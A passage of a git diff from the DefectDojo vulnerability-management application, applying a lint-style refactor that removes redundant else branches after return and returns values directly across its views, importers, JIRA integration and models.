args=(member.group.id, ))) + return HttpResponseRedirect(reverse("view_group", args=(member.group.id, ))) if member.role.is_owner and not user_has_permission(request.user, member.group, Permissions.Group_Add_Owner): messages.add_message(request, messages.WARNING, @@ -465,8 +463,7 @@ def edit_group_member(request, mid): extra_tags="alert-success") if is_title_in_breadcrumbs("View User"): return HttpResponseRedirect(reverse("view_user", args=(member.user.id, ))) - else: - return HttpResponseRedirect(reverse("view_group", args=(member.group.id, ))) + return HttpResponseRedirect(reverse("view_group", args=(member.group.id, ))) add_breadcrumb(title="Edit a Group Member", top_level=False, request=request) return render(request, "dojo/edit_group_member.html", { @@ -492,8 +489,7 @@ def delete_group_member(request, mid): extra_tags="alert-warning") if is_title_in_breadcrumbs("View User"): return HttpResponseRedirect(reverse("view_user", args=(member.user.id, ))) - else: - return HttpResponseRedirect(reverse("view_group", args=(member.group.id, ))) + return HttpResponseRedirect(reverse("view_group", args=(member.group.id, ))) user = member.user member.delete() @@ -503,11 +499,9 @@ def delete_group_member(request, mid): extra_tags="alert-success") if 
is_title_in_breadcrumbs("View User"): return HttpResponseRedirect(reverse("view_user", args=(member.user.id, ))) - else: - if user == request.user: - return HttpResponseRedirect(reverse("groups")) - else: - return HttpResponseRedirect(reverse("view_group", args=(member.group.id, ))) + if user == request.user: + return HttpResponseRedirect(reverse("groups")) + return HttpResponseRedirect(reverse("view_group", args=(member.group.id, ))) add_breadcrumb("Delete a group member", top_level=False, request=request) return render(request, "dojo/delete_group_member.html", { diff --git a/dojo/importers/auto_create_context.py b/dojo/importers/auto_create_context.py index 6325ece9699..9f2a1cb7e76 100644 --- a/dojo/importers/auto_create_context.py +++ b/dojo/importers/auto_create_context.py @@ -229,16 +229,15 @@ def get_or_create_product_type( # Look for an existing object if product_type := self.get_target_product_type_if_exists(product_type_name=product_type_name): return product_type - else: - with transaction.atomic(): - product_type, created = Product_Type.objects.select_for_update().get_or_create(name=product_type_name) - if created: - Product_Type_Member.objects.create( - user=get_current_user(), - product_type=product_type, - role=Role.objects.get(is_owner=True), - ) - return product_type + with transaction.atomic(): + product_type, created = Product_Type.objects.select_for_update().get_or_create(name=product_type_name) + if created: + Product_Type_Member.objects.create( + user=get_current_user(), + product_type=product_type, + role=Role.objects.get(is_owner=True), + ) + return product_type def get_or_create_product( self, diff --git a/dojo/importers/base_importer.py b/dojo/importers/base_importer.py index 22e9ee5cbfe..6a05b3934ce 100644 --- a/dojo/importers/base_importer.py +++ b/dojo/importers/base_importer.py @@ -255,11 +255,10 @@ def determine_process_method( parsed_findings, **kwargs, ) - else: - return self.sync_process_findings( - parsed_findings, - **kwargs, - ) + return self.sync_process_findings( + parsed_findings, + **kwargs, + ) def update_test_meta(self): """ @@ -276,7 +275,7 @@ def update_test_meta(self): if not self.commit_hash.isspace(): self.test.commit_hash = self.commit_hash - return None + return def update_timestamps(self): """ @@ -510,7 +509,7 @@ def verify_tool_configuration_from_test(self): # Return early as there is no value in validating further return # Validate that the test has a value - elif self.test is not None: + if self.test is not None: # Make sure the Tool_Configuration is connected to the product that the test is if self.api_scan_configuration.product != self.test.engagement.product: msg = "API Scan Configuration has to be from same product as the Test" @@ -536,7 +535,7 @@ def verify_tool_configuration_from_engagement(self): # Return early as there is no value in validating further return # Validate that the engagement has a value - elif self.engagement is not None: + if self.engagement is not None: # Make sure the Tool_Configuration is connected to the engagement that the test is if self.api_scan_configuration.product != self.engagement.product: msg = "API Scan Configuration has to be from same product as the Engagement" diff --git a/dojo/importers/default_reimporter.py b/dojo/importers/default_reimporter.py index 290e13f6ac5..9063838c73d 100644 --- a/dojo/importers/default_reimporter.py +++ b/dojo/importers/default_reimporter.py @@ -399,12 +399,12 @@ def match_new_finding_to_existing_finding( test=self.test, hash_code=unsaved_finding.hash_code, 
).exclude(hash_code=None).order_by("id") - elif self.deduplication_algorithm == "unique_id_from_tool": + if self.deduplication_algorithm == "unique_id_from_tool": return Finding.objects.filter( test=self.test, unique_id_from_tool=unsaved_finding.unique_id_from_tool, ).exclude(unique_id_from_tool=None).order_by("id") - elif self.deduplication_algorithm == "unique_id_from_tool_or_hash_code": + if self.deduplication_algorithm == "unique_id_from_tool_or_hash_code": query = Finding.objects.filter( Q(test=self.test), (Q(hash_code__isnull=False) & Q(hash_code=unsaved_finding.hash_code)) @@ -412,7 +412,7 @@ def match_new_finding_to_existing_finding( ).order_by("id") deduplicationLogger.debug(query.query) return query - elif self.deduplication_algorithm == "legacy": + if self.deduplication_algorithm == "legacy": # This is the legacy reimport behavior. Although it's pretty flawed and doesn't match the legacy algorithm for deduplication, # this is left as is for simplicity. # Re-writing the legacy deduplication here would be complicated and counter-productive. @@ -423,9 +423,8 @@ def match_new_finding_to_existing_finding( test=self.test, severity=unsaved_finding.severity, numerical_severity=Finding.get_numerical_severity(unsaved_finding.severity)).order_by("id") - else: - logger.error(f'Internal error: unexpected deduplication_algorithm: "{self.deduplication_algorithm}"') - return None + logger.error(f'Internal error: unexpected deduplication_algorithm: "{self.deduplication_algorithm}"') + return None def process_matched_finding( self, @@ -441,16 +440,15 @@ def process_matched_finding( unsaved_finding, existing_finding, ) - elif existing_finding.is_mitigated: + if existing_finding.is_mitigated: return self.process_matched_mitigated_finding( unsaved_finding, existing_finding, ) - else: - return self.process_matched_active_finding( - unsaved_finding, - existing_finding, - ) + return self.process_matched_active_finding( + unsaved_finding, + existing_finding, + ) def process_matched_special_status_finding( self, @@ -480,7 +478,7 @@ def process_matched_special_status_finding( # We also need to add the finding to 'unchanged_items' as otherwise it will get mitigated by the reimporter # (Risk accepted findings are not set to mitigated by Defectdojo) # We however do not exit the loop as we do want to update the endpoints (in case some endpoints were fixed) - elif existing_finding.risk_accepted and not existing_finding.active: + if existing_finding.risk_accepted and not existing_finding.active: self.unchanged_items.append(existing_finding) return existing_finding, False # The finding was not an exact match, so we need to add more details about from the @@ -521,47 +519,44 @@ def process_matched_mitigated_finding( logger.debug(msg) # Return True here to force the loop to continue return existing_finding, True - else: - # even if there is no mitigation time, skip it, because both the current finding and - # the reimported finding are is_mitigated - # Return True here to force the loop to continue - return existing_finding, True - else: - if self.do_not_reactivate: - logger.debug( - "Skipping reactivating by user's choice do_not_reactivate: " - f" - {existing_finding.id}: {existing_finding.title} " - f"({existing_finding.component_name} - {existing_finding.component_version})", - ) - # Search for an existing note that this finding has been skipped for reactivation - # before this current time - reactivated_note_text = f"Finding has skipped reactivation from {self.scan_type} re-upload with user decision 
do_not_reactivate." - existing_note = existing_finding.notes.filter( + # even if there is no mitigation time, skip it, because both the current finding and + # the reimported finding are is_mitigated + # Return True here to force the loop to continue + return existing_finding, True + if self.do_not_reactivate: + logger.debug( + "Skipping reactivating by user's choice do_not_reactivate: " + f" - {existing_finding.id}: {existing_finding.title} " + f"({existing_finding.component_name} - {existing_finding.component_version})", + ) + # Search for an existing note that this finding has been skipped for reactivation + # before this current time + reactivated_note_text = f"Finding has skipped reactivation from {self.scan_type} re-upload with user decision do_not_reactivate." + existing_note = existing_finding.notes.filter( + entry=reactivated_note_text, + author=self.user, + ) + # If a note has not been left before, we can skip this finding + if len(existing_note) == 0: + note = Notes( entry=reactivated_note_text, author=self.user, ) - # If a note has not been left before, we can skip this finding - if len(existing_note) == 0: - note = Notes( - entry=reactivated_note_text, - author=self.user, - ) - note.save() - existing_finding.notes.add(note) - existing_finding.save(dedupe_option=False) - # Return True here to force the loop to continue - return existing_finding, True - else: - logger.debug( - f"Reactivating: - {existing_finding.id}: {existing_finding.title} " - f"({existing_finding.component_name} - {existing_finding.component_version})", - ) - existing_finding.mitigated = None - existing_finding.is_mitigated = False - existing_finding.mitigated_by = None - existing_finding.active = True - if self.verified is not None: - existing_finding.verified = self.verified + note.save() + existing_finding.notes.add(note) + existing_finding.save(dedupe_option=False) + # Return True here to force the loop to continue + return existing_finding, True + logger.debug( + f"Reactivating: - {existing_finding.id}: {existing_finding.title} " + f"({existing_finding.component_name} - {existing_finding.component_version})", + ) + existing_finding.mitigated = None + existing_finding.is_mitigated = False + existing_finding.mitigated_by = None + existing_finding.active = True + if self.verified is not None: + existing_finding.verified = self.verified component_name = getattr(unsaved_finding, "component_name", None) component_version = getattr(unsaved_finding, "component_version", None) @@ -706,9 +701,8 @@ def finding_post_processing( # Process vulnerability IDs if finding_from_report.unsaved_vulnerability_ids: finding.unsaved_vulnerability_ids = finding_from_report.unsaved_vulnerability_ids - finding = self.process_vulnerability_ids(finding) - return finding + return self.process_vulnerability_ids(finding) def process_groups_for_all_findings( self, @@ -767,8 +761,7 @@ def process_results( serialized_to_mitigate, serialized_untouched, ) - else: - return self.new_items, self.reactivated_items, self.to_mitigate, self.untouched + return self.new_items, self.reactivated_items, self.to_mitigate, self.untouched def calculate_unsaved_finding_hash_code( self, diff --git a/dojo/importers/endpoint_manager.py b/dojo/importers/endpoint_manager.py index 2ee3e7d3009..ba7172efaa3 100644 --- a/dojo/importers/endpoint_manager.py +++ b/dojo/importers/endpoint_manager.py @@ -57,7 +57,7 @@ def add_endpoints_to_unsaved_finding( endpoint=ep, defaults={"date": finding.date}) logger.debug(f"IMPORT_SCAN: {len(endpoints)} imported") - return None + 
return @dojo_async_task @app.task() @@ -79,7 +79,7 @@ def mitigate_endpoint_status( endpoint_status.mitigated_by = user endpoint_status.mitigated = True endpoint_status.save() - return None + return @dojo_async_task @app.task() @@ -100,7 +100,7 @@ def reactivate_endpoint_status( endpoint_status.mitigated = False endpoint_status.last_modified = timezone.now() endpoint_status.save() - return None + return def chunk_endpoints( self, @@ -158,7 +158,7 @@ def clean_unsaved_endpoints( endpoint.clean() except ValidationError as e: logger.warning(f"DefectDojo is storing broken endpoint because cleaning wasn't successful: {e}") - return None + return def chunk_endpoints_and_reactivate( self, @@ -182,7 +182,7 @@ def chunk_endpoints_and_reactivate( self.reactivate_endpoint_status(endpoint_status_list, sync=False) else: self.reactivate_endpoint_status(endpoint_status_list, sync=True) - return None + return def chunk_endpoints_and_mitigate( self, @@ -207,7 +207,7 @@ def chunk_endpoints_and_mitigate( self.mitigate_endpoint_status(endpoint_status_list, user, sync=False) else: self.mitigate_endpoint_status(endpoint_status_list, user, sync=True) - return None + return def update_endpoint_status( self, @@ -242,4 +242,4 @@ def update_endpoint_status( ) self.chunk_endpoints_and_reactivate(endpoint_status_to_reactivate) self.chunk_endpoints_and_mitigate(endpoint_status_to_mitigate, user) - return None + return diff --git a/dojo/jira_link/helper.py b/dojo/jira_link/helper.py index b5e3ba8b219..ee844280555 100644 --- a/dojo/jira_link/helper.py +++ b/dojo/jira_link/helper.py @@ -99,6 +99,7 @@ def is_push_all_issues(instance): jira_project = get_jira_project(instance) if jira_project: return jira_project.push_all_issues + return None # checks if a finding can be pushed to JIRA @@ -173,12 +174,11 @@ def get_jira_project(obj, use_inheritance=True): if obj.jira_project: return obj.jira_project # some old jira_issue records don't have a jira_project, so try to go via the finding instead - elif hasattr(obj, "finding") and obj.finding: + if hasattr(obj, "finding") and obj.finding: return get_jira_project(obj.finding, use_inheritance=use_inheritance) - elif hasattr(obj, "engagement") and obj.engagement: + if hasattr(obj, "engagement") and obj.engagement: return get_jira_project(obj.finding, use_inheritance=use_inheritance) - else: - return None + return None if isinstance(obj, Finding) or isinstance(obj, Stub_Finding): finding = obj @@ -205,9 +205,8 @@ def get_jira_project(obj, use_inheritance=True): if use_inheritance: logger.debug("delegating to product %s for %s", engagement.product, engagement) return get_jira_project(engagement.product) - else: - logger.debug("not delegating to product %s for %s", engagement.product, engagement) - return None + logger.debug("not delegating to product %s for %s", engagement.product, engagement) + return None if isinstance(obj, Product): # TODO: refactor relationships, but now this would brake APIv1 (and v2?) 
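Most hunks in this patch apply the same mechanical rewrite: once a branch ends in return, the trailing else (or chained elif) is dropped and its body is dedented, so the final statement becomes the unconditional fallthrough. This matches the style enforced by the flake8-return / ruff RET lint rules, which is presumably the motivation here, though the patch itself does not say so. A minimal standalone sketch of the before/after shape, modeled loosely on the get_numerical_severity hunk in dojo/models.py rather than taken verbatim from the repository:

    # Before: every branch sits inside if/elif/else, although each one returns.
    def numerical_severity_before(severity):
        if severity == "Critical":
            return "S0"
        elif severity == "High":
            return "S1"
        else:
            return "S5"

    # After: guard clauses with early returns; the default is the fallthrough.
    def numerical_severity_after(severity):
        if severity == "Critical":
            return "S0"
        if severity == "High":
            return "S1"
        return "S5"

Behavior is identical in both forms; the rewrite only removes a level of indentation, which is why most hunks in this patch are pure reshuffles of existing lines.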
@@ -241,7 +240,7 @@ def get_jira_url(obj): issue = get_jira_issue(obj) if issue is not None: return get_jira_issue_url(issue) - elif isinstance(obj, Finding): + if isinstance(obj, Finding): # finding must only have url if there is a jira_issue # engagement can continue to show url of jiraproject instead of jira issue return None @@ -320,8 +319,7 @@ def get_jira_issue_template(obj): if isinstance(obj, Finding_Group): return os.path.join(template_dir, "jira-finding-group-description.tpl") - else: - return os.path.join(template_dir, "jira-description.tpl") + return os.path.join(template_dir, "jira-description.tpl") def get_jira_creation(obj): @@ -357,6 +355,7 @@ def get_jira_issue(obj): return obj.jira_issue except JIRA_Issue.DoesNotExist: return None + return None def has_jira_configured(obj): @@ -424,6 +423,7 @@ def get_jira_connection(obj): if jira_instance is not None: return get_jira_connection_raw(jira_instance.url, jira_instance.username, jira_instance.password) + return None def jira_get_resolution_id(jira, issue, status): @@ -468,6 +468,7 @@ def get_jira_updated(finding): project = get_jira_project(finding) issue = jira_get_issue(project, j_issue) return issue.fields.updated + return None # Used for unit testing so geting all the connections is manadatory @@ -481,6 +482,7 @@ def get_jira_status(finding): project = get_jira_project(finding) issue = jira_get_issue(project, j_issue) return issue.fields.status + return None # Used for unit testing so geting all the connections is manadatory @@ -494,6 +496,7 @@ def get_jira_comments(finding): project = get_jira_project(finding) issue = jira_get_issue(project, j_issue) return issue.fields.comment.comments + return None # Logs the error to the alerts table, which appears in the notification toolbar @@ -617,7 +620,7 @@ def jira_priority(obj): def jira_environment(obj): if isinstance(obj, Finding): return "\n".join([str(endpoint) for endpoint in obj.endpoints.all()]) - elif isinstance(obj, Finding_Group): + if isinstance(obj, Finding_Group): envs = [ jira_environment(finding) for finding in obj.findings.all() @@ -625,8 +628,7 @@ def jira_environment(obj): jira_environments = [env for env in envs if env] return "\n".join(jira_environments) - else: - return "" + return "" def push_to_jira(obj, *args, **kwargs): @@ -638,25 +640,22 @@ def push_to_jira(obj, *args, **kwargs): finding = obj if finding.has_jira_issue: return update_jira_issue_for_finding(finding, *args, **kwargs) - else: - return add_jira_issue_for_finding(finding, *args, **kwargs) + return add_jira_issue_for_finding(finding, *args, **kwargs) - elif isinstance(obj, Engagement): + if isinstance(obj, Engagement): engagement = obj if engagement.has_jira_issue: return update_epic(engagement, *args, **kwargs) - else: - return add_epic(engagement, *args, **kwargs) + return add_epic(engagement, *args, **kwargs) - elif isinstance(obj, Finding_Group): + if isinstance(obj, Finding_Group): group = obj if group.has_jira_issue: return update_jira_issue_for_finding_group(group, *args, **kwargs) - else: - return add_jira_issue_for_finding_group(group, *args, **kwargs) + return add_jira_issue_for_finding_group(group, *args, **kwargs) - else: - logger.error("unsupported object passed to push_to_jira: %s %i %s", obj.__name__, obj.id, obj) + logger.error("unsupported object passed to push_to_jira: %s %i %s", obj.__name__, obj.id, obj) + return None def add_issues_to_epic(jira, obj, epic_id, issue_keys, ignore_epics=True): @@ -1022,9 +1021,7 @@ def get_jira_issue_from_jira(find): jira = 
get_jira_connection(jira_instance) logger.debug("getting issue from JIRA") - issue_from_jira = jira.issue(j_issue.jira_id) - - return issue_from_jira + return jira.issue(j_issue.jira_id) except JIRAError as e: logger.exception(e) @@ -1191,6 +1188,7 @@ def jira_attachment(finding, jira, issue, file, jira_filename=None): logger.exception(e) log_jira_alert("Attachment: " + e.text, finding) return False + return None def jira_check_attachment(issue, source_file_name): @@ -1242,9 +1240,9 @@ def close_epic(eng, push_to_jira, **kwargs): logger.exception(e) log_jira_generic_alert("Jira Engagement/Epic Close Error", str(e)) return False - else: - add_error_message_to_response("Push to JIRA for Epic skipped because enable_engagement_epic_mapping is not checked for this engagement") - return False + return None + add_error_message_to_response("Push to JIRA for Epic skipped because enable_engagement_epic_mapping is not checked for this engagement") + return False @dojo_model_to_id @@ -1350,9 +1348,8 @@ def jira_get_issue(jira_project, issue_key): try: jira_instance = jira_project.jira_instance jira = get_jira_connection(jira_instance) - issue = jira.issue(issue_key) + return jira.issue(issue_key) - return issue except JIRAError as jira_error: logger.debug("error retrieving jira issue " + issue_key + " " + str(jira_error)) logger.exception(jira_error) @@ -1386,6 +1383,8 @@ def add_comment(obj, note, force_push=False, **kwargs): except JIRAError as e: log_jira_generic_alert("Jira Add Comment Error", str(e)) return False + return None + return None def add_simple_jira_comment(jira_instance, jira_issue, comment): diff --git a/dojo/jira_link/queries.py b/dojo/jira_link/queries.py index 6d41b3b6e21..b077c076097 100644 --- a/dojo/jira_link/queries.py +++ b/dojo/jira_link/queries.py @@ -63,7 +63,7 @@ def get_authorized_jira_projects(permission, user=None): product__member=Exists(product_authorized_product_roles), product__prod_type__authorized_group=Exists(product_authorized_product_type_groups), product__authorized_group=Exists(product_authorized_product_groups)) - jira_projects = jira_projects.filter( + return jira_projects.filter( Q(engagement__product__prod_type__member=True) | Q(engagement__product__member=True) | Q(engagement__product__prod_type__authorized_group=True) @@ -73,8 +73,6 @@ def get_authorized_jira_projects(permission, user=None): | Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - return jira_projects - def get_authorized_jira_issues(permission): user = get_current_user() @@ -152,7 +150,7 @@ def get_authorized_jira_issues(permission): finding__test__engagement__product__member=Exists(finding_authorized_product_roles), finding__test__engagement__product__prod_type__authorized_group=Exists(finding_authorized_product_type_groups), finding__test__engagement__product__authorized_group=Exists(finding_authorized_product_groups)) - jira_issues = jira_issues.filter( + return jira_issues.filter( Q(engagement__product__prod_type__member=True) | Q(engagement__product__member=True) | Q(engagement__product__prod_type__authorized_group=True) @@ -165,5 +163,3 @@ def get_authorized_jira_issues(permission): | Q(finding__test__engagement__product__member=True) | Q(finding__test__engagement__product__prod_type__authorized_group=True) | Q(finding__test__engagement__product__authorized_group=True)) - - return jira_issues diff --git a/dojo/jira_link/views.py b/dojo/jira_link/views.py index e618c84f01c..fc2f67a373a 100644 --- a/dojo/jira_link/views.py +++ b/dojo/jira_link/views.py 
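Two secondary patterns recur alongside the else-removal, both visible in the dojo/jira_link files above: a queryset or value that was bound to a temporary only to be returned on the next line is now returned directly, and functions that previously fell off the end implicitly now close with an explicit "return None" (or a bare "return" where no caller uses the value). A small sketch of both, using hypothetical names for illustration only, not code from the repository:

    def get_authorized_widgets(user, widgets):
        # Before: result = [w for w in widgets if w.owner == user]
        #         return result
        # After: the final expression is returned directly, with no temporary.
        return [w for w in widgets if w.owner == user]

    def find_widget(widgets, name):
        for widget in widgets:
            if widget.name == name:
                return widget
        # Before, the function simply fell off the end of the loop; the
        # explicit None makes every exit path visible to readers and linters.
        return None

Neither change alters behavior: find_widget already returned None implicitly when the loop exhausted, and the direct return is equivalent to the temporary it replaces.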
@@ -67,10 +67,10 @@ def webhook(request, secret=None): if not system_settings.enable_jira: return webhook_responser_handler("info", "Ignoring incoming webhook as JIRA is disabled.") # If the webhook is not enabled, then return a 404 - elif not system_settings.enable_jira_web_hook: + if not system_settings.enable_jira_web_hook: return webhook_responser_handler("info", "Ignoring incoming webhook as JIRA Webhook is disabled.") # Determine if the request should be "authenticated" - elif not system_settings.disable_jira_webhook_secret: + if not system_settings.disable_jira_webhook_secret: # Make sure there is a value for the webhook secret before making a comparison if not system_settings.jira_webhook_secret: return webhook_responser_handler("info", "Ignoring incoming webhook as JIRA Webhook secret is empty in Defect Dojo system settings.") @@ -211,7 +211,7 @@ def check_for_and_create_comment(parsed_json): """ comment = parsed_json.get("comment", None) if comment is None: - return + return None comment_text = comment.get("body") commenter = "" @@ -271,6 +271,7 @@ def check_for_and_create_comment(parsed_json): finding.jira_issue.jira_change = timezone.now() finding.jira_issue.save() finding.save() + return None def get_custom_field(jira, label): @@ -432,8 +433,7 @@ def post(self, request): url=request.build_absolute_uri(reverse("jira"))) return HttpResponseRedirect(reverse("jira")) - else: - logger.error("jform.errors: %s", jform.errors) + logger.error("jform.errors: %s", jform.errors) return render(request, self.get_template(), {"jform": jform}) diff --git a/dojo/management/commands/jira_status_reconciliation.py b/dojo/management/commands/jira_status_reconciliation.py index 6ca72dbe1f1..e26aefc0516 100644 --- a/dojo/management/commands/jira_status_reconciliation.py +++ b/dojo/management/commands/jira_status_reconciliation.py @@ -86,7 +86,7 @@ def jira_status_reconciliation(*args, **kwargs): messages.append(message) logger.info(message) continue - elif find.risk_accepted: + if find.risk_accepted: message = "{}; {}/finding/{};{};{};{};{};{};{};{};{};{};{};{}skipping risk accepted findings;{}".format( find.jira_issue.jira_key, settings.SITE_URL, find.id, find.status(), resolution_name, None, None, None, find.jira_issue.jira_change, issue_from_jira.fields.updated, find.last_status_update, issue_from_jira.fields.updated, find.last_reviewed, issue_from_jira.fields.updated, "skipped") @@ -186,6 +186,7 @@ def jira_status_reconciliation(*args, **kwargs): logger.info("results (semicolon seperated)") for message in messages: logger.info(message) + return None class Command(BaseCommand): diff --git a/dojo/metrics/utils.py b/dojo/metrics/utils.py index 8ca345b41f7..884658d5ba1 100644 --- a/dojo/metrics/utils.py +++ b/dojo/metrics/utils.py @@ -597,5 +597,4 @@ def findings_queryset( """ if qs.model is Endpoint_Status: return Finding.objects.filter(status_finding__in=qs) - else: - return qs + return qs diff --git a/dojo/models.py b/dojo/models.py index 308db965228..2346c1e916c 100644 --- a/dojo/models.py +++ b/dojo/models.py @@ -764,9 +764,8 @@ def get_absolute_url(self): return reverse("product_type", args=[str(self.id)]) def get_breadcrumbs(self): - bc = [{"title": str(self), + return [{"title": str(self), "url": reverse("edit_product_type", args=(self.id,))}] - return bc @cached_property def critical_present(self): @@ -774,6 +773,7 @@ def critical_present(self): test__engagement__product__prod_type=self, severity="Critical") if c_findings.count() > 0: return True + return None @cached_property def 
high_present(self): @@ -781,6 +781,7 @@ def high_present(self): test__engagement__product__prod_type=self, severity="High") if c_findings.count() > 0: return True + return None @cached_property def calc_health(self): @@ -798,8 +799,7 @@ def calc_health(self): health = health - ((h_findings.count() - 1) * 2) if health < 5: return 5 - else: - return health + return health # only used by bulk risk acceptance api @property @@ -835,9 +835,8 @@ def __str__(self): return self.name def get_breadcrumbs(self): - bc = [{"title": str(self), + return [{"title": str(self), "url": None}] - return bc class DojoMeta(models.Model): @@ -1180,8 +1179,7 @@ def endpoint_host_count(self): for e in endpoints: if e.host in hosts: continue - else: - hosts.append(e.host) + hosts.append(e.host) return len(hosts) @@ -1196,53 +1194,51 @@ def endpoint_count(self): def open_findings(self, start_date=None, end_date=None): if start_date is None or end_date is None: return {} - else: - critical = Finding.objects.filter(test__engagement__product=self, - mitigated__isnull=True, - verified=True, - false_p=False, - duplicate=False, - out_of_scope=False, - severity="Critical", - date__range=[start_date, - end_date]).count() - high = Finding.objects.filter(test__engagement__product=self, + critical = Finding.objects.filter(test__engagement__product=self, mitigated__isnull=True, verified=True, false_p=False, duplicate=False, out_of_scope=False, - severity="High", + severity="Critical", date__range=[start_date, end_date]).count() - medium = Finding.objects.filter(test__engagement__product=self, - mitigated__isnull=True, - verified=True, - false_p=False, - duplicate=False, - out_of_scope=False, - severity="Medium", - date__range=[start_date, - end_date]).count() - low = Finding.objects.filter(test__engagement__product=self, - mitigated__isnull=True, - verified=True, - false_p=False, - duplicate=False, - out_of_scope=False, - severity="Low", - date__range=[start_date, - end_date]).count() - return {"Critical": critical, - "High": high, - "Medium": medium, - "Low": low, - "Total": (critical + high + medium + low)} + high = Finding.objects.filter(test__engagement__product=self, + mitigated__isnull=True, + verified=True, + false_p=False, + duplicate=False, + out_of_scope=False, + severity="High", + date__range=[start_date, + end_date]).count() + medium = Finding.objects.filter(test__engagement__product=self, + mitigated__isnull=True, + verified=True, + false_p=False, + duplicate=False, + out_of_scope=False, + severity="Medium", + date__range=[start_date, + end_date]).count() + low = Finding.objects.filter(test__engagement__product=self, + mitigated__isnull=True, + verified=True, + false_p=False, + duplicate=False, + out_of_scope=False, + severity="Low", + date__range=[start_date, + end_date]).count() + return {"Critical": critical, + "High": high, + "Medium": medium, + "Low": low, + "Total": (critical + high + medium + low)} def get_breadcrumbs(self): - bc = [{"title": str(self), + return [{"title": str(self), "url": reverse("view_product", args=(self.id,))}] - return bc @property def get_product_type(self): @@ -1700,9 +1696,8 @@ def __str__(self): msg = "hyperlink lib did not create URL as was expected" raise ValueError(msg) return clean_url - else: - msg = "Missing host" - raise ValueError(msg) + msg = "Missing host" + raise ValueError(msg) except: url = "" if self.protocol: @@ -1814,11 +1809,9 @@ def __eq__(self, other): products_match = (self.product) == other.product # Check if the contents match return products_match and 
contents_match - else: - return contents_match + return contents_match - else: - return NotImplemented + return NotImplemented @property def is_broken(self): @@ -1829,8 +1822,7 @@ def is_broken(self): else: if self.product: return False - else: - return True + return True @property def mitigated(self): @@ -1851,7 +1843,7 @@ def findings_count(self): return self.findings.all().count() def active_findings(self): - findings = self.findings.filter( + return self.findings.filter( active=True, out_of_scope=False, mitigated__isnull=True, @@ -1861,10 +1853,9 @@ def active_findings(self): status_finding__out_of_scope=False, status_finding__risk_accepted=False, ).order_by("numerical_severity") - return findings def active_verified_findings(self): - findings = self.findings.filter( + return self.findings.filter( active=True, verified=True, out_of_scope=False, @@ -1875,7 +1866,6 @@ def active_verified_findings(self): status_finding__out_of_scope=False, status_finding__risk_accepted=False, ).order_by("numerical_severity") - return findings @property def active_findings_count(self): @@ -1919,7 +1909,7 @@ def host_findings_count(self): return self.host_findings().count() def host_active_findings(self): - findings = Finding.objects.filter( + return Finding.objects.filter( active=True, out_of_scope=False, mitigated__isnull=True, @@ -1930,10 +1920,9 @@ def host_active_findings(self): status_finding__risk_accepted=False, endpoints__in=self.host_endpoints(), ).order_by("numerical_severity") - return findings def host_active_verified_findings(self): - findings = Finding.objects.filter( + return Finding.objects.filter( active=True, verified=True, out_of_scope=False, @@ -1945,7 +1934,6 @@ def host_active_verified_findings(self): status_finding__risk_accepted=False, endpoints__in=self.host_endpoints(), ).order_by("numerical_severity") - return findings @property def host_active_findings_count(self): @@ -2220,8 +2208,7 @@ def get_queryset(self): super_query = super_query.annotate(created_findings_count=Count("findings", filter=Q(test_import_finding_action__action=IMPORT_CREATED_FINDING))) super_query = super_query.annotate(closed_findings_count=Count("findings", filter=Q(test_import_finding_action__action=IMPORT_CLOSED_FINDING))) super_query = super_query.annotate(reactivated_findings_count=Count("findings", filter=Q(test_import_finding_action__action=IMPORT_REACTIVATED_FINDING))) - super_query = super_query.annotate(untouched_findings_count=Count("findings", filter=Q(test_import_finding_action__action=IMPORT_UNTOUCHED_FINDING))) - return super_query + return super_query.annotate(untouched_findings_count=Count("findings", filter=Q(test_import_finding_action__action=IMPORT_UNTOUCHED_FINDING))) class Meta: ordering = ("-id",) @@ -2878,53 +2865,47 @@ def hash_fields(self, fields_to_hash): def duplicate_finding_set(self): if self.duplicate: if self.duplicate_finding is not None: - originals = Finding.objects.get( + return Finding.objects.get( id=self.duplicate_finding.id).original_finding.all().order_by("title") - return originals # we need to add the duplicate_finding here as well - else: - return [] - else: - return self.original_finding.all().order_by("title") + return [] + return self.original_finding.all().order_by("title") def get_scanner_confidence_text(self): if self.scanner_confidence and isinstance(self.scanner_confidence, int): if self.scanner_confidence <= 2: return "Certain" - elif self.scanner_confidence >= 3 and self.scanner_confidence <= 5: + if self.scanner_confidence >= 3 and self.scanner_confidence 
<= 5: return "Firm" - else: - return "Tentative" + return "Tentative" return "" @staticmethod def get_numerical_severity(severity): if severity == "Critical": return "S0" - elif severity == "High": + if severity == "High": return "S1" - elif severity == "Medium": + if severity == "Medium": return "S2" - elif severity == "Low": + if severity == "Low": return "S3" - elif severity == "Info": + if severity == "Info": return "S4" - else: - return "S5" + return "S5" @staticmethod def get_number_severity(severity): if severity == "Critical": return 4 - elif severity == "High": + if severity == "High": return 3 - elif severity == "Medium": + if severity == "Medium": return 2 - elif severity == "Low": + if severity == "Low": return 1 - elif severity == "Info": + if severity == "Info": return 0 - else: - return 5 + return 5 @staticmethod def get_severity(num_severity): @@ -2998,8 +2979,7 @@ def sla_age(self): def get_sla_start_date(self): if self.sla_start_date: return self.sla_start_date - else: - return self.date + return self.date def get_sla_period(self): sla_configuration = SLA_Configuration.objects.filter(id=self.test.engagement.product.sla_configuration_id).first() @@ -3010,7 +2990,7 @@ def get_sla_period(self): def set_sla_expiration_date(self): system_settings = System_Settings.objects.get() if not system_settings.enable_finding_sla: - return None + return days_remaining = None sla_period, enforce_period = self.get_sla_period() @@ -3018,7 +2998,7 @@ def set_sla_expiration_date(self): days_remaining = sla_period - self.sla_age else: self.sla_expiration_date = Finding().sla_expiration_date - return None + return if days_remaining: if self.mitigated: @@ -3036,8 +3016,7 @@ def sla_days_remaining(self): if isinstance(mitigated_date, datetime): mitigated_date = self.mitigated.date() return (self.sla_expiration_date - mitigated_date).days - else: - return (self.sla_expiration_date - get_current_date()).days + return (self.sla_expiration_date - get_current_date()).days return None def sla_deadline(self): @@ -3079,9 +3058,8 @@ def has_jira_issue(self): @cached_property def finding_group(self): - group = self.finding_group_set.all().first() + return self.finding_group_set.all().first() # logger.debug('finding.finding_group: %s', group) - return group @cached_property def has_jira_group_issue(self): @@ -3131,21 +3109,20 @@ def get_valid_request_response_pairs(self): # Get a list of all req/resp pairs all_req_resps = self.burprawrequestresponse_set.all() # Filter away those that do not have any contents - valid_req_resps = all_req_resps.exclude( + return all_req_resps.exclude( burpRequestBase64__exact=empty_value, burpResponseBase64__exact=empty_value, ) - return valid_req_resps - def get_report_requests(self): # Get the list of request response pairs that are non empty 